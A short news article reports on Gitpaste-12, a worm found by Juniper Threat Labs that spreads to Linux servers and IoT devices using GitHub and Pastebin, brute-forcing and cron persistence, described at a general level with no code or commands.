A new worm has been discovered by researchers at Juniper Threat Labs that targets Linux-based x86 servers, in addition to Linux ARM and MIPS-based IoT devices. It is believed that the malware, dubbed Gitpaste-12, could potentially be deployed against additional targets in the future, as its test code suggests the malware is still in development.
The threat uses GitHub and Pastebin to house component code and uses at least 12 attack modules to compromise target devices. Juniper has reported both the Pastebin URL and GitHub repository that was initially used by the worm, resulting in both being shut down.
The Gitpaste-12 exploit operates by first using known exploits or brute forcing passwords to gain entry into a system. It then uses a cron software utility to schedule updates to the botnet. System defences are systematically taken down, including those connected to large-scale public cloud deployments.
Opening a can of worms
Differentiating itself from other forms of malware, worms create copies of themselves that are then spread to other devices. Sometimes worms are tasked with installing malicious software or even simply self-replicating over and over again, depleting system resources. In either situation, worms can be particularly frustrating to remove.
“No malware is good to have, but worms are particularly annoying,” Juniper explained in a blog post. “Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in a poor reputation for your organization.”
According to ongoing analysis, Gitpaste-12 has a low detection rate across antivirus programs. Still, certain security packages will provide safeguards against the worm malware, including Juniper’s SRX Intrusion Detection and Prevention solution and Juniper ATP Cloud.